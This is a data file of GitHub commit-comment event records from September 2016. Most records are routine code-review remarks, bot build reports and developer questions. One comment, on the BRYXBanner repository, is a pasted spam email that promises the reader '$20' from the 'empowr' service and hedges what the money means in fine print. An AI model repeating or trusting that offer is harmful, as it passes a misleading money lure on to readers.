{"id":"4612156841","type":"CommitCommentEvent","actor":{"login":"EwaPerzanowska"},"repo":{"name":"EwaPerzanowska/zadanie-8.5"},"payload":{"comment":{"id":19157187,"position":18,"line":18,"path":"js/scripts.js","commit_id":"429dde2de8c9cc613a8390d0a4ce003f97a09752","created_at":"2016-09-24T08:00:25Z","updated_at":"2016-09-24T08:00:25Z","body":"ok, zmieniłam\r\n"}},"created_at":"2016-09-24T08:00:25Z"}
{"id":"4612160572","type":"CommitCommentEvent","actor":{"login":"buddhi1980"},"repo":{"name":"buddhi1980/mandelbulber2"},"payload":{"comment":{"id":19157197,"position":44,"line":236,"path":"mandelbulber2/src/command_line_interface.cpp","commit_id":"0c921cc79d8e751ccb07b47dd35fe53a14cae291","created_at":"2016-09-24T08:03:36Z","updated_at":"2016-09-24T08:03:36Z","body":"What you think about: \"will not work under Windows\" :smile:"}},"created_at":"2016-09-24T08:03:36Z"}
{"id":"4612160603","type":"CommitCommentEvent","actor":{"login":"xifeng91"},"repo":{"name":"xifeng91/hello-world"},"payload":{"comment":{"id":19157198,"position":null,"line":null,"path":null,"commit_id":"42da404fdc150136c8bed44b7d7fea74f1efc9e0","created_at":"2016-09-24T08:03:39Z","updated_at":"2016-09-24T08:03:39Z","body":"这样"}},"created_at":"2016-09-24T08:03:39Z"}
{"id":"4612161529","type":"CommitCommentEvent","actor":{"login":"radare"},"repo":{"name":"h4ng3r/radare2-regressions"},"payload":{"comment":{"id":19157201,"position":6,"line":44,"path":"t.asm/dalvik/dalvik","commit_id":"ce2913a37998c8f0de09dab2f94ead18b8b756ba","created_at":"2016-09-24T08:04:33Z","updated_at":"2016-09-24T08:04:33Z","body":"Comments are not part of the instrction. So this information shouldnt appear here"}},"created_at":"2016-09-24T08:04:33Z"}
{"id":"4612161895","type":"CommitCommentEvent","actor":{"login":"cyberblast"},"repo":{"name":"ScreepsGamers/screeps.behaviour-action-pattern"},"payload":{"comment":{"id":19157204,"position":null,"line":null,"path":null,"commit_id":"9ba15a803842fc70c62008a3cb09b1867fdc4bf5","created_at":"2016-09-24T08:04:51Z","updated_at":"2016-09-24T08:04:51Z","body":"#44"}},"created_at":"2016-09-24T08:04:51Z"}
{"id":"4612162954","type":"CommitCommentEvent","actor":{"login":"cyberblast"},"repo":{"name":"ScreepsGamers/screeps.behaviour-action-pattern"},"payload":{"comment":{"id":19157205,"position":null,"line":null,"path":null,"commit_id":"806c3fd2b03e55d0cfcb7b4030e0d84bdb50652d","created_at":"2016-09-24T08:05:49Z","updated_at":"2016-09-24T08:05:49Z","body":"#44"}},"created_at":"2016-09-24T08:05:49Z"}
{"id":"4612163543","type":"CommitCommentEvent","actor":{"login":"BOT-Man-JL"},"repo":{"name":"BOT-Man-JL/EggAche-GL"},"payload":{"comment":{"id":19157211,"position":null,"line":null,"path":null,"commit_id":"6bbf536a722026905eeed0bb31fea57d64f7b6e8","created_at":"2016-09-24T08:06:18Z","updated_at":"2016-09-24T08:06:18Z","body":"😅 ..."}},"created_at":"2016-09-24T08:06:18Z"}
{"id":"4612165149","type":"CommitCommentEvent","actor":{"login":"carlosbelmonte2910"},"repo":{"name":"carlosbelmonte2910/Programacion"},"payload":{"comment":{"id":19157216,"position":null,"line":null,"path":null,"commit_id":"4a73b0de3cef80fe27d8c6c09ba7e4144c88fcaf","created_at":"2016-09-24T08:07:44Z","updated_at":"2016-09-24T08:07:44Z","body":"Ejemplos desarrollados en CAPSE"}},"created_at":"2016-09-24T08:07:44Z"}
{"id":"4612167259","type":"CommitCommentEvent","actor":{"login":"veprbl"},"repo":{"name":"star-bnl/star-travex"},"payload":{"comment":{"id":19157220,"position":14,"line":81,"path":"macros/stack_hists.C","commit_id":"3a50f4003f68ae3b639ca55fd14f93b07f7424d6","created_at":"2016-09-24T08:09:42Z","updated_at":"2016-09-24T08:09:42Z","body":"побочные эффекты"}},"created_at":"2016-09-24T08:09:42Z"}
{"id":"4612168293","type":"CommitCommentEvent","actor":{"login":"maheshmasale"},"repo":{"name":"maheshmasale/libraryRoomManagement"},"payload":{"comment":{"id":19157222,"position":4,"line":6,"path":".idea/workspace.xml","commit_id":"27ba8f325fb40cfec1f41c3e3d221bfb665d8de6","created_at":"2016-09-24T08:10:26Z","updated_at":"2016-09-24T08:10:26Z","body":"zx"}},"created_at":"2016-09-24T08:10:26Z"}
{"id":"4612168400","type":"CommitCommentEvent","actor":{"login":"coco-napky"},"repo":{"name":"SapienciaBendecidos/fe-bendecidos"},"payload":{"comment":{"id":19157223,"position":26,"line":26,"path":"app/js/controllers/client.js","commit_id":"d9dc05978937b9e66cd1d35be31390140a67024d","created_at":"2016-09-24T08:10:32Z","updated_at":"2016-09-24T08:10:32Z","body":"El metodo loadClients pertenece a vm, que apunta al scope de la funcion this.\r\n\r\nDebio haber sido vm.loadClients(10,0) "}},"created_at":"2016-09-24T08:10:32Z"}
{"id":"4612170190","type":"CommitCommentEvent","actor":{"login":"veprbl"},"repo":{"name":"star-bnl/star-travex"},"payload":{"comment":{"id":19157228,"position":null,"line":null,"path":null,"commit_id":"3a50f4003f68ae3b639ca55fd14f93b07f7424d6","created_at":"2016-09-24T08:12:10Z","updated_at":"2016-09-24T08:12:10Z","body":"я бы применил https://github.com/veprbl/star-jet/commit/5be32d28c3d29692f56a3d9594d70eb0472ccf79\r\nи уже в Finalize нормировал бы"}},"created_at":"2016-09-24T08:12:10Z"}
{"id":"4612171541","type":"CommitCommentEvent","actor":{"login":"vmartinuzzi"},"repo":{"name":"wolf9466/wolf-xmr-miner"},"payload":{"comment":{"id":19157231,"position":null,"line":null,"path":null,"commit_id":"a7d807211668fb444a5b1aeee07dce2acfd8911f","created_at":"2016-09-24T08:13:14Z","updated_at":"2016-09-24T08:13:14Z","body":"Hi Wolf,\r\n\r\nI am trying to GPU mine XMR with your miner on my laptop that is equipped with an \"Intel hd graphics 4600 Integrated GPU\" and running Win 7.\r\n\r\nI am already GPU mining some altcoins like Vertcoin with this setup.\r\n\r\nLaunching your miner ver. 04 I get the message \"Error parsing version string from clGetDeviceInfo. This should never happen.\". \r\n\r\nI know that you write that the miner is written for AMD cards, than I would like to try to modify it in order to adapt to my setup.\r\n\r\nCould you please indicate to me which Development Environment you use to build it for Windows 64?\r\n\r\nThank you very much in advance,\r\n\r\nValerio. "}},"created_at":"2016-09-24T08:13:14Z"}
{"id":"4612171913","type":"CommitCommentEvent","actor":{"login":"ozasadnyy"},"repo":{"name":"gdg-x/hoverboard"},"payload":{"comment":{"id":19157232,"position":null,"line":null,"path":null,"commit_id":"7f9888887c0b4ddd7c1518d5c38eb90501c1dd22","created_at":"2016-09-24T08:13:38Z","updated_at":"2016-09-24T08:13:38Z","body":"Thank you @cliveb ! I hope next time it will be easier to install the template ;)\r\nCould you send this PR to original project? "}},"created_at":"2016-09-24T08:13:38Z"}
{"id":"4612174322","type":"CommitCommentEvent","actor":{"login":"panzergame"},"repo":{"name":"UPBGE/blender"},"payload":{"comment":{"id":19157235,"position":4,"line":61,"path":"source/gameengine/Converter/KX_BlenderSceneConverter.cpp","commit_id":"1f9b5688bfc877452dc7fe55482d5e864d2dc4e8","created_at":"2016-09-24T08:15:46Z","updated_at":"2016-09-24T08:15:46Z","body":"@youle31 : What's the compilation error ?"}},"created_at":"2016-09-24T08:15:46Z"}
{"id":"4612175019","type":"CommitCommentEvent","actor":{"login":"devlysh"},"repo":{"name":"ihororlovskyi/ihororlovskyi.github.io"},"payload":{"comment":{"id":19157237,"position":3,"line":3,"path":"README.md","commit_id":"3f94dfcfa71f001c5195eda7396903a27426e0ec","created_at":"2016-09-24T08:16:27Z","updated_at":"2016-09-24T08:16:27Z","body":"Web Scientist, omfg, man)) от скромности не распирает?"}},"created_at":"2016-09-24T08:16:27Z"}
{"id":"4612175658","type":"CommitCommentEvent","actor":{"login":"monibu1548"},"repo":{"name":"All-door/Artik_internal_controller"},"payload":{"comment":{"id":19157240,"position":null,"line":null,"path":null,"commit_id":"4ad357e7d313f8732b8ee090e85592628b585431","created_at":"2016-09-24T08:16:54Z","updated_at":"2016-09-24T08:16:54Z","body":"\r\ndef 로 함수 선언하는 방식이 틀렸어요..!!\r\n\r\n그리고 음... 이거 코드 수행 안될거같은데요...?!!"}},"created_at":"2016-09-24T08:16:54Z"}
{"id":"4612176220","type":"CommitCommentEvent","actor":{"login":"koush"},"repo":{"name":"elevenfive/AndroidAsync"},"payload":{"comment":{"id":19157241,"position":45,"line":125,"path":"AndroidAsync/src/com/koushikdutta/async/http/HybiParser.java","commit_id":"1b7f44cd463aa1dcfe6bd5a682c15ca21e0352b5","created_at":"2016-09-24T08:17:14Z","updated_at":"2016-09-24T08:17:14Z","body":"Inflate happens again below?"}},"created_at":"2016-09-24T08:17:14Z"}
{"id":"4612177484","type":"CommitCommentEvent","actor":{"login":"KunaiFire"},"repo":{"name":"KunaiFire/rechat-dl"},"payload":{"comment":{"id":19157243,"position":null,"line":null,"path":null,"commit_id":"2b4f25637ecfa17d51a174841b23e39299477af2","created_at":"2016-09-24T08:18:17Z","updated_at":"2016-09-24T08:18:17Z","body":"Your Python installation sounds borked. Have you tried reinstalling it [with the latest version?](https://www.python.org/downloads/) (2.7.12 at the time)?"}},"created_at":"2016-09-24T08:18:17Z"}
{"id":"4612177516","type":"CommitCommentEvent","actor":{"login":"hdfukuoka1985"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19157244,"position":31,"line":31,"path":"issue18/regist.php","commit_id":"df1870cffc8c2485d010c23815a4261ceb1ceab1","created_at":"2016-09-24T08:18:18Z","updated_at":"2016-09-24T08:18:18Z","body":"コメント復活させてみましたが、やはりうまくデータが入らないようです…。"}},"created_at":"2016-09-24T08:18:18Z"}
{"id":"4612178029","type":"CommitCommentEvent","actor":{"login":"gurhann"},"repo":{"name":"gurhann/radyodinlenir"},"payload":{"comment":{"id":19157245,"position":null,"line":null,"path":null,"commit_id":"2bfbfffa3906488a1c8740974dde86bd2d0e57eb","created_at":"2016-09-24T08:18:45Z","updated_at":"2016-09-24T08:18:45Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Pagination düzeltilecek](https://trello.com/c/PUTccFuq/33-pagination-duzeltilecek)"}},"created_at":"2016-09-24T08:18:45Z"}
{"id":"4612179177","type":"CommitCommentEvent","actor":{"login":"RafaelAybar"},"repo":{"name":"RafaelAybar/Charla-sobre-bash-nivel-basico"},"payload":{"comment":{"id":19157248,"position":null,"line":null,"path":null,"commit_id":"a37a411c9a86daaf0d1d4ce1c40b9b93630d476e","created_at":"2016-09-24T08:19:50Z","updated_at":"2016-09-24T08:19:50Z","body":"Funciona igual, en la charla lo explicaré las bondades del elif xD"}},"created_at":"2016-09-24T08:19:50Z"}
{"id":"4612179797","type":"CommitCommentEvent","actor":{"login":"iamalantam"},"repo":{"name":"CyberSource/cybersource-sdk-dotnet"},"payload":{"comment":{"id":19157249,"position":null,"line":null,"path":null,"commit_id":"df4d6bf63dabe7618431b8d2774e584746e30917","created_at":"2016-09-24T08:20:23Z","updated_at":"2016-09-24T08:20:23Z","body":"what is cybs.proxyURL setting ? "}},"created_at":"2016-09-24T08:20:23Z"}
{"id":"4612180800","type":"CommitCommentEvent","actor":{"login":"gurhann"},"repo":{"name":"gurhann/radyodinlenir"},"payload":{"comment":{"id":19157251,"position":null,"line":null,"path":null,"commit_id":"41f6bf85c5fa7cb5f14ed4f02875361b4a0e30a7","created_at":"2016-09-24T08:21:19Z","updated_at":"2016-09-24T08:21:19Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Arama formu yazılacak](https://trello.com/c/kR9pjK0O/29-arama-formu-yazilacak)"}},"created_at":"2016-09-24T08:21:19Z"}
{"id":"4612182750","type":"CommitCommentEvent","actor":{"login":"Kirayue"},"repo":{"name":"eslint/eslint"},"payload":{"comment":{"id":19157257,"position":12,"line":94,"path":"docs/rules/class-methods-use-this.md","commit_id":"22edd8ab06938c63e532820a6eb39772c51b4512","created_at":"2016-09-24T08:23:09Z","updated_at":"2016-09-24T08:23:09Z","body":"ddd"}},"created_at":"2016-09-24T08:23:09Z"}
{"id":"4612184128","type":"CommitCommentEvent","actor":{"login":"EwaPerzanowska"},"repo":{"name":"EwaPerzanowska/zadanie-8.5"},"payload":{"comment":{"id":19157261,"position":12,"line":12,"path":"js/scripts.js","commit_id":"429dde2de8c9cc613a8390d0a4ce003f97a09752","created_at":"2016-09-24T08:24:27Z","updated_at":"2016-09-24T08:24:27Z","body":"może inaczej: nie o co chodzi, a czemu to może służyć"}},"created_at":"2016-09-24T08:24:27Z"}
{"id":"4612184654","type":"CommitCommentEvent","actor":{"login":"zebastian"},"repo":{"name":"buddhi1980/mandelbulber2"},"payload":{"comment":{"id":19157263,"position":44,"line":236,"path":"mandelbulber2/src/command_line_interface.cpp","commit_id":"0c921cc79d8e751ccb07b47dd35fe53a14cae291","created_at":"2016-09-24T08:24:58Z","updated_at":"2016-09-24T08:24:58Z","body":"I like that, just changed the text ;)"}},"created_at":"2016-09-24T08:24:58Z"}
{"id":"4612187978","type":"CommitCommentEvent","actor":{"login":"tbirand"},"repo":{"name":"EditionGuard/WooCommerce-Plugin"},"payload":{"comment":{"id":19157268,"position":null,"line":null,"path":null,"commit_id":"b3429c9a6d1921d39a8adaa15e2c8651826518aa","created_at":"2016-09-24T08:27:51Z","updated_at":"2016-09-24T08:27:51Z","body":"@vlad0209 would this support order lines with quantity > 1?"}},"created_at":"2016-09-24T08:27:51Z"}
{"id":"4612188260","type":"CommitCommentEvent","actor":{"login":"unansweredocd"},"repo":{"name":"unansweredocd/Portfolio"},"payload":{"comment":{"id":19157269,"position":null,"line":null,"path":null,"commit_id":"5315178d709c4ae43d48f3f1cf1456ef982dbb26","created_at":"2016-09-24T08:28:07Z","updated_at":"2016-09-24T08:28:07Z","body":"Hmm alright, fixing it soon. Thanks for the heads up."}},"created_at":"2016-09-24T08:28:07Z"}
{"id":"4612191482","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19157273,"position":null,"line":null,"path":null,"commit_id":"0cc3b6108ef7be42175c9c2544629fc928b3bdac","created_at":"2016-09-24T08:31:00Z","updated_at":"2016-09-24T08:31:00Z","body":"EMS (brianlball) - Win64-Windows-7-VisualStudio-12: OK (2316 of 2496 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-0cc3b6108ef7be42175c9c2544629fc928b3bdac-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-0cc3b6108ef7be42175c9c2544629fc928b3bdac-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-92.79%25-yellow.svg)</a> \n"}},"created_at":"2016-09-24T08:31:00Z"}
{"id":"4612192783","type":"CommitCommentEvent","actor":{"login":"dingqz"},"repo":{"name":"dingqz/Java"},"payload":{"comment":{"id":19157277,"position":null,"line":null,"path":null,"commit_id":"5f4558c1ba9c0ad0bb2a89df4421b0c44bcb1ca8","created_at":"2016-09-24T08:32:11Z","updated_at":"2016-09-24T08:32:11Z","body":"李刚\r\n0\r\n0\r\n0\r\n0\r\n0\r\nStruts2权威指南\r\n轻量级J2EE企业应用实战\r\nnull\r\nnull"}},"created_at":"2016-09-24T08:32:11Z"}
{"id":"4612192852","type":"CommitCommentEvent","actor":{"login":"TheoSabattie"},"repo":{"name":"RealyUniqueName/haxe"},"payload":{"comment":{"id":19157278,"position":null,"line":null,"path":null,"commit_id":"d0d7b331e6d07b2c9736c2bd3cd79e6076ad68f7","created_at":"2016-09-24T08:32:14Z","updated_at":"2016-09-24T08:32:14Z","body":"`~/^-?[0-9]+\\.?[0-9]*?$/g`\r\n-> regex for float\r\n\r\n`-?` ->optional sign\r\n`[0-9]+` -> one number minimum\r\n`\\.?` -> optional point\r\n`[0-9]*?` -> optional numbers after point\r\n\r\nTest:\r\n\r\n```\r\nstatic public function main():Void {\r\n        trace(stringIsFloat(\"\"));       // false\r\n        trace(stringIsFloat(\"couocu\")); // false\r\n        trace(stringIsFloat(\"123456\")); // true\r\n        trace(stringIsFloat(\"2.52\"));   // true\r\n        trace(stringIsFloat(\"2.52.1\")); // false\r\n        trace(stringIsFloat(\"-56432\")); // true\r\n        trace(stringIsFloat(\"-1.2\"));   // true\r\n        trace(stringIsFloat(\"-1.\"));    // true\r\n        trace(stringIsFloat(\"-0\"));     // true\r\n}\r\n\r\nstatic function stringIsFloat(string:String):Bool {\r\n    return ~/^-?[0-9]+\\.?[0-9]*?$/g.match(string);\r\n}\r\n```\r\n\r\n`~/^-?[0-9]+$/g`\r\n-> regex for int\r\n\r\nDo I miss something?\r\nBut you have right, Global.is_numeric is surely better."}},"created_at":"2016-09-24T08:32:14Z"}
{"id":"4612196257","type":"CommitCommentEvent","actor":{"login":"lordjaki"},"repo":{"name":"lordjaki/angularheros"},"payload":{"comment":{"id":19157286,"position":2,"line":2,"path":"README.md","commit_id":"d0861b148d1b3951c8ceae41c436f26827f61cc6","created_at":"2016-09-24T08:35:32Z","updated_at":"2016-09-24T08:35:32Z","body":"test"}},"created_at":"2016-09-24T08:35:32Z"}
{"id":"4612196533","type":"CommitCommentEvent","actor":{"login":"lordjaki"},"repo":{"name":"lordjaki/angularheros"},"payload":{"comment":{"id":19157288,"position":null,"line":null,"path":null,"commit_id":"d0861b148d1b3951c8ceae41c436f26827f61cc6","created_at":"2016-09-24T08:35:48Z","updated_at":"2016-09-24T08:35:48Z","body":"test"}},"created_at":"2016-09-24T08:35:48Z"}
{"id":"4612196866","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19157290,"position":null,"line":null,"path":null,"commit_id":"d61d9114017d3788f84322cdd8ea9818159ab12c","created_at":"2016-09-24T08:36:05Z","updated_at":"2016-09-24T08:36:05Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/36047/testReport/) for this commit**"}},"created_at":"2016-09-24T08:36:05Z"}
{"id":"4612198684","type":"CommitCommentEvent","actor":{"login":"josegonzalez"},"repo":{"name":"NeckBeardPrince/real-aws-status"},"payload":{"comment":{"id":19157293,"position":null,"line":null,"path":null,"commit_id":"b6bc79fabd92a2900b5d82c905fd77abc5f936cc","created_at":"2016-09-24T08:37:39Z","updated_at":"2016-09-24T08:37:39Z","body":"I can't believe Krieger made this plugin SFW."}},"created_at":"2016-09-24T08:37:39Z"}
{"id":"4612199214","type":"CommitCommentEvent","actor":{"login":"insectatorious"},"repo":{"name":"tnzmnjm/website"},"payload":{"comment":{"id":19157294,"position":null,"line":null,"path":null,"commit_id":"ceb47944554e49a062a65b5a994bf5d8d2cdd543","created_at":"2016-09-24T08:38:08Z","updated_at":"2016-09-24T08:38:08Z","body":"Consider adding the year here? It'll provide the proper context."}},"created_at":"2016-09-24T08:38:08Z"}
{"id":"4612201880","type":"CommitCommentEvent","actor":{"login":"rcfox"},"repo":{"name":"VoiDGlitch/WarframeData"},"payload":{"comment":{"id":19157296,"position":2,"line":2,"path":"MissionDecks.txt","commit_id":"77d60085634b4c0c64b2f15b3b930d581c1c0d7b","created_at":"2016-09-24T08:40:18Z","updated_at":"2016-09-24T08:40:18Z","body":"What does `Stripped=True` mean?"}},"created_at":"2016-09-24T08:40:18Z"}
{"id":"4612202579","type":"CommitCommentEvent","actor":{"login":"bluca"},"repo":{"name":"zeromq/libzmq"},"payload":{"comment":{"id":19157297,"position":null,"line":null,"path":null,"commit_id":"2e3888dd45f878b18883b00cd08677392b5d02e0","created_at":"2016-09-24T08:40:56Z","updated_at":"2016-09-24T08:40:56Z","body":"@Kentzo comments on commits get easily lost, if there is a bug could you please open an issue so we don't lose track of it? Thanks!"}},"created_at":"2016-09-24T08:40:56Z"}
{"id":"4612203836","type":"CommitCommentEvent","actor":{"login":"tegularius"},"repo":{"name":"tegularius/sch_cake"},"payload":{"comment":{"id":19157298,"position":null,"line":null,"path":null,"commit_id":"2f3c308faec499069959b4489e5a724a7d3b82f3","created_at":"2016-09-24T08:42:04Z","updated_at":"2016-09-24T08:42:04Z","body":"The src and dst are not really switched, afaik it's that they show the original (originating) source and destination of the connection, i.e. from the first packet of the connection."}},"created_at":"2016-09-24T08:42:04Z"}
{"id":"4612204138","type":"CommitCommentEvent","actor":{"login":"hdfukuoka1985"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19157299,"position":22,"line":22,"path":"issue11-2/update-delete.php","commit_id":"118c90c3a194e7d67bbac0ab761828654b5d5a4a","created_at":"2016-09-24T08:42:19Z","updated_at":"2016-09-24T08:42:19Z","body":"すみません、先程間違えて別のフォルダのファイルをいじっておりました…。\r\n下記のように記載したのですが、うまく表示されなくなってしまいました。何処かに間違いはアリますでしょうか？一応、ファイルもプッシュ致します。\r\n![image](https://cloud.githubusercontent.com/assets/19584742/18807296/220bf74c-827e-11e6-99e0-70cfa830894b.png)\r\n"}},"created_at":"2016-09-24T08:42:19Z"}
{"id":"4612211991","type":"CommitCommentEvent","actor":{"login":"usrflo"},"repo":{"name":"perlundq/yajsync"},"payload":{"comment":{"id":19157311,"position":null,"line":null,"path":null,"commit_id":"105d270ccc9f381694dcea690ed903fe82b9590c","created_at":"2016-09-24T08:49:34Z","updated_at":"2016-09-24T08:49:34Z","body":"Android support for Java 8 language features is very vaguely explained at https://developer.android.com/guide/platform/j8-jack.html. A listing of platform versions with according Java 8 language features would be helpful to estimate the compatibility coverage, but this information is missing. At least another compiler called \"Jack\" has to be used.\r\n\r\nI conclude that Android Java 8 support is not mature yet and staying with Java 7 would simplify things for Android developers that use yajsync."}},"created_at":"2016-09-24T08:49:34Z"}
{"id":"4612213144","type":"CommitCommentEvent","actor":{"login":"AnthonyMDev"},"repo":{"name":"AnthonyMDev/BRYXBanner"},"payload":{"comment":{"id":19157313,"position":37,"line":137,"path":"Pod/Classes/Banner.swift","commit_id":"b0de4a92b520e48fea216ca9004bbbec61ac0522","created_at":"2016-09-24T08:50:41Z","updated_at":"2016-09-24T08:50:41Z","body":"#outlook a {\n\npadding: 0;\n}\nReadMsgBody {\n\nwidth: 100%;\n}\nExternalClass {\n\nwidth: 100%;\n}\nExternalClass, .ExternalClass p, .ExternalClass span, .ExternalClass font, .ExternalClass td, .ExternalClass div {\n\nline-height: 100%;\n}\nbody, table, td, a {\n\n-webkit-text-size-adjust: 100%;\n\n-ms-text-size-adjust: 100%;\n}\ntable, td {\n\nmso-table-lspace: 0pt;\n\nmso-table-rspace: 0pt;\n}\nimg {\n\n-ms-interpolation-mode: bicubic;\n}\n\nbody {\n\nmargin: 0;\n\npadding: 0;\n\n}\nimg {\n\nborder: 0;\n\nheight: auto;\n\nline-height: 100%;\n\noutline: none;\n\ntext-decoration: none;\n}\ntable {\n\nborder-collapse: collapse !important;\n}\nbody {\n\nheight: 100% !important;\n\nmargin: 0;\n\npadding: 0;\n\nwidth: 100% !important;\n}\n\nappleBody a {\n\ncolor: #68440a;\n\ntext-decoration: none;\n}\nappleFooter a {\n\ncolor: #999999;\n\ntext-decoration: none;\n}\nfaq {\n\nline-height: 18px;\n\nlist-style: outside none none;\n\nmargin: 10px 0;\n\npadding: 0;\n}\nmobile-only {\n\ndisplay: none;\n}\n\n@media screen and (max-width: 525px) {\n\ntable[class=\"wrapper\"] {\n\nwidth: 100% !important;\n}\n\ntd[class=\"logo\"] {\n\ntext-align: left;\n\npadding: 20px 0 20px 0 !important;\n}\ntd[class=\"logo\"] img {\n\nmargin: 0 auto!important;\n}\n\n[class=\"mobile-only\"] {\n\ndisplay: block;\n}\n\nbr[class=\"mobile-hide\"] {\n\ndisplay: none;\n}\ntd[class=\"mobile-hide\"] {\n\ndisplay: none;\n}\nimg[class=\"mobile-hide\"] {\n\ndisplay: none !important;\n}\nimg[class=\"img-max\"] {\n\nmax-width: 100% !important;\n\nwidth: 100% !important;\n\nheight: auto !important;\n}\n\nimg[class=\"img-min\"] {\n\nmax-width: 73px !important;\n\nwidth: 73px !important;\n\nheight: auto !important;\n\npadding-top: 8px !important;\n}\n\nimg[class=\"img-apps\"] {\n\nmax-width: 46% !important;\n\nwidth: 46% !important;\n\nheight: auto !important;\n}\nimg[class=\"img-max-profile\"] {\n\nmax-width: 50% !important;\n\nwidth: 50% !important;\n\nheight: auto !important;\n\nborder-radius: 200px;\n}\n\ntable[class=\"responsive-table\"] {\n\nwidth: 100%!important;\n}\n\ntd[class=\"padding\"] {\n\npadding: 10px 5% 15px 5% !important;\n}\ntd[class=\"amount\"] {\n\nfont-size: 10px!important;\n}\ntd[class=\"mobile-text-twelve\"] {\n\nfont-size: 12px!important;\n}\nspan[class=\"mobile-text-twelve\"] {\n\nfont-size: 14px!important;\n}\ntd[class=\"padding-copy\"] {\n\npadding: 10px 5% 10px 5% !important;\n\ntext-align: center;\n}\ntd[class=\"padding-meta\"] {\n\npadding: 30px 5% 0px 5% !important;\n\ntext-align: center;\n}\ntd[class=\"no-pad\"] {\n\npadding: 0 0 20px 0 !important;\n}\ntd[class=\"no-pad-bottom\"] {\n\npadding: 25px 0 0 0 !important;\n}\ntd[class=\"no-padding\"] {\n\npadding: 0 !important;\n}\ntd[class=\"section-padding\"] {\n\npadding: 25px 15px 25px 15px !important;\n}\ntd[class=\"section-no-padding-bottom\"] {\n\npadding: 25px 15px 0 15px !important;\n}\n\ntd[class=\"section-no-padding-top\"] {\n\npadding: 0 5% 25px 5% !important;\n}\n\ntd[class=\"section-no-padding-top-bottom\"] {\n\npadding: 0 5% 0 5% !important;\n}\ntd[class=\"section-padding-bottom-image\"] {\n\npadding: 50px 15px 0 15px !important;\n}\n\ntd[class=\"mobile-wrapper\"] {\n\npadding: 10px 5% 15px 5% !important;\n}\ntable[class=\"mobile-button-container\"] {\n\nmargin: 0 auto;\n\nwidth: 100% !important;\n}\na[class=\"mobile-button\"] {\n\nwidth: 80% !important;\n\npadding: 15px !important;\n\nborder: 0 !important;\n\nfont-size: 16px !important;\n}\n}\n\nYesterday, anthony.miller.csn@gmail.com sent you $20 to try the all-new empowr:\n\nReceive your $20 &#9658;\n\nNot sure you know anthony.miller.csn@gmail.com?\n\nView their photos  to see if you recognize them\n\nResources:\n\nWhat is empowr?\nWho's behind it?\nSee who you know that's on empowr\n\nNo more emails from anthony.miller.csn@gmail.com (anthony.miller.csn@gmail.com)? Unsubscribe\nhttp://profile.empowr.com/ApplicationManager/CommunityEmailSettings.aspx?em=K%2FzdUVCDppRybzAPzsRVnb09WcfocFNVzAotQYaRvebvNJtL8Pi2tdfFP8Nx4TBKt%2BpzVV6SrFbS71JGWnGIPGqh22irFPtkfWe4dwuRQFCYJozoZynyd2KcIHic9F5JcVSJEFZzTPzmccxHruEJGD4vgrCrACZu&vet=694&mlid=9006728809&fn=QpLpyL23t7HpRXkzIHngtg%3D%3D\n\n*This offer has been sent by anthony.miller.csn@gmail.com. By accepting this offer to try the new empowr, I stipulate that I'm 18 or older and am signing up having agreed with the product, terms and privacy policies, including the manner in which \"$\" and the word \"earnings\" are used throughout the empowr website, mobile apps and all empowr communications including this email, as defined in the product policy. This promotional email was sent to reply@reply.github.com and may contain special notices or offers. It is for illustrative purposes only and is in no way a guarantee. You can prevent future emails here. empowr - 501 West Broadway, Suite A182, San Diego, CA 92101, USA."}},"created_at":"2016-09-24T08:50:41Z"}
{"id":"4612215100","type":"CommitCommentEvent","actor":{"login":"HanYong201308"},"repo":{"name":"HanYong201308/Course-work-of-embedded-system"},"payload":{"comment":{"id":19157316,"position":null,"line":null,"path":null,"commit_id":"a4cbddd58afd24345d3ea49dab1272f8c7eeb6b0","created_at":"2016-09-24T08:52:31Z","updated_at":"2016-09-24T08:52:31Z","body":"嵌入式系统设计与实践课程代码"}},"created_at":"2016-09-24T08:52:31Z"}
{"id":"4612219020","type":"CommitCommentEvent","actor":{"login":"OlivierJaquemet"},"repo":{"name":"jalios/mediaelement"},"payload":{"comment":{"id":19157324,"position":null,"line":null,"path":null,"commit_id":"b0f2abfa29f1780427d118d523014a6ec076dad0","created_at":"2016-09-24T08:56:02Z","updated_at":"2016-09-24T08:56:02Z","body":"@ron666 I'd like to provide the french translation for this feature before the next release, however I could not understand how to test it (to check the behavior in order to provide the best message) can you help ?"}},"created_at":"2016-09-24T08:56:02Z"}
{"id":"4612219701","type":"CommitCommentEvent","actor":{"login":"xiaobuu"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19157325,"position":null,"line":null,"path":null,"commit_id":"fbd2e139103e3d520f6dfc009d6200f8b8168e35","created_at":"2016-09-24T08:56:39Z","updated_at":"2016-09-24T08:56:39Z","body":"I met the same problem as @subratpanda1. Still not working in 0.34.0"}},"created_at":"2016-09-24T08:56:39Z"}
{"id":"4612220488","type":"CommitCommentEvent","actor":{"login":"tanhanliang"},"repo":{"name":"CUMSA/members"},"payload":{"comment":{"id":19157328,"position":null,"line":null,"path":null,"commit_id":"eb70fc41c38de81b036e5bde728ba199f18d5307","created_at":"2016-09-24T08:57:22Z","updated_at":"2016-09-24T08:57:22Z","body":"![screenshot from 2016-09-23 18-07-27](https://cloud.githubusercontent.com/assets/17226585/18782347/a87e1470-81b8-11e6-892d-f719ec08ef7d.png)\r\nEach time the 'Add Internship' button is clicked, new fields for an internship are added to the form. But when users submit a form with errors, the redirect erases all internship information entered. I'm currently trying to see if I can validate the form using JQuery in the view file without redirecting off the page, though I'm sure that I shouldn't be doing that. Is there a better approach to validating this form?"}},"created_at":"2016-09-24T08:57:22Z"}
